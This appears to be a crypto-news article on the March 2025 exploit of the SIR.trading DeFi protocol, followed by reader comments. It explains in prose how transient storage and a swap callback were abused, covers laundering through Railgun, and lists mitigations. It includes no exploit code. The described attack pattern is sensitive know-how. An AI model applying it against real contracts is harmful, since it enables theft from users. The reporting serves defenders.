A $355,000 exploit targeting Ethereum-based DeFi protocol SIR.trading on March 30, 2025 has exposed a previously theoretical attack surface that could reshape how developers approach smart contract security. The breach, which drained the protocol’s entire total value locked, leveraged Ethereum’s transient storage feature introduced in the Dencun upgrade — marking what security researchers believe is the first known exploitation of this mechanism in the wild.
The Exploit Mechanics
The attack centered on SIR.trading’s Vault contract, specifically targeting the uniswapV3SwapCallback function. Blockchain security firm TenArmor was the first to publicly flag the incident on March 30, noting unusual transaction patterns that indicated an active exploit in progress. According to subsequent analysis by Decurity and SlowMist’s MistEye monitoring system, the attacker manipulated transient storage — a temporary data storage mechanism introduced with EIP-1153 as part of Ethereum’s Dencun hard fork — to compromise critical security checks during transaction execution.
Transient storage, by design, allows smart contracts to store data that persists only within a single transaction but is accessible across different call frames. While this feature was intended to reduce gas costs and improve efficiency, the SIR.trading exploit demonstrates how it can be weaponized. The attacker exploited a callback function to manipulate security data mid-transaction, redirecting $355,000 in funds to a controlled address. The stolen assets were subsequently laundered through Railgun, a privacy-focused transaction protocol.
Consensys Diligence’s end-of-year report classified the attack vector as “Transient Storage Manipulation + Vanity Address Bruteforce,” noting that the attacker combined the novel storage exploit with a brute-forced vanity address to maximize the attack’s effectiveness.
Affected Systems
SIR.trading, a leveraged trading protocol built on Ethereum, lost its entire TVL in the attack. With Bitcoin trading around $82,334 and Ethereum near $1,806 at the time, the exploit sent ripples through the DeFi community, particularly among protocols that had integrated transient storage features following the Dencun upgrade. The incident raises questions about how many other protocols may be exposed to similar vulnerabilities.
Following the exploit, SIR.trading’s founder publicly appealed for the return of the stolen funds, even offering a $100,000 bounty to the attacker. The protocol’s complete TVL wipeout left users with no recoverable funds, highlighting the catastrophic potential of vulnerabilities in protocols with concentrated liquidity positions.
The Mitigation Strategy
Security researchers have outlined several defensive measures that protocols integrating transient storage should adopt. First, callback functions that interact with transient storage must implement rigorous re-entrancy guards that account for the new persistence model. Traditional re-entrancy checks may be insufficient because transient storage’s cross-call-frame accessibility creates novel state manipulation opportunities.
Second, protocols should undergo specialized audits focusing specifically on EIP-1153 integration points. Standard smart contract audits may not adequately cover the unique attack surfaces introduced by transient storage. Third, real-time monitoring systems like SlowMist’s MistEye, which detected the SIR.trading attack, should be deployed to flag anomalous transaction patterns before full exploit execution.
Lessons Learned
The SIR.trading exploit carries a sobering message for the broader DeFi ecosystem: every new Ethereum Improvement Proposal introduces not just capabilities, but attack surfaces. The Dencun upgrade, primarily celebrated for reducing layer-2 transaction costs through blob transactions, also quietly introduced transient storage — a feature that, as March 30 demonstrated, carries significant security implications.
March 2025 saw total Web3 security losses of approximately $33.99 million across 13 hacking incidents, according to SlowMist’s monthly report. Phishing attacks affected nearly 6,000 victims with $6.366 million in losses. The SIR.trading exploit, while not the largest incident of the month, stands out for its novel attack vector that could portend a new category of DeFi vulnerabilities.
User Action Required
For users, the incident reinforces the importance of due diligence before depositing funds into any DeFi protocol, particularly those that have recently upgraded to leverage new Ethereum features. Users should verify that protocols have undergone comprehensive security audits covering all EIP integrations, monitor security alert channels for real-time incident notifications, and avoid concentrating large portions of their portfolio in any single protocol. In a market where Bitcoin trades above $82,000 and the total crypto market cap exceeds $2.5 trillion, the incentive for sophisticated attacks will only grow.
Disclaimer: This article is for informational purposes only and does not constitute financial or investment advice. Always conduct your own research before engaging with any DeFi protocol.
EIP-1153 transient storage was supposed to save gas and instead it became an attack vector. classic Ethereum unintended consequences.
the SIR.trading team probably thought they were being clever using transient storage for gas optimization. clever is the enemy of safe.
gas optimization creating attack vectors is peak ethereum. every EIP that saves gas seems to introduce a new class of vulnerability. the tradeoff never ends
the tradeoff never ends because every gas optimization changes the execution model. TSTORE was clean on paper but the interaction with callback functions was underspecified
first known exploitation of transient storage in the wild. this is going to trigger a wave of audits checking Dencun-related code paths.
Tomasz K. the Dencun audit wave is already starting. saw three protocol teams announce emergency reviews of their EIP-1153 usage this week alone. $355K loss triggering millions in audit fees
$355K is relatively small but the attack pattern is what matters. any protocol using TSTORE in security checks should be re-audited immediately.
opcode_scan_ 355K drained but the audit costs from this one incident will be 10x that. every TSTORE protocol scrambling for reviews right now
agreed on re-audit urgency. the attack pattern is transferable to any protocol using TSTORE for access control checks, not just SIR.trading
sec_research_ the transferable pattern is the real danger. any DeFi protocol that used TSTORE for auth checks in swap callbacks needs an emergency review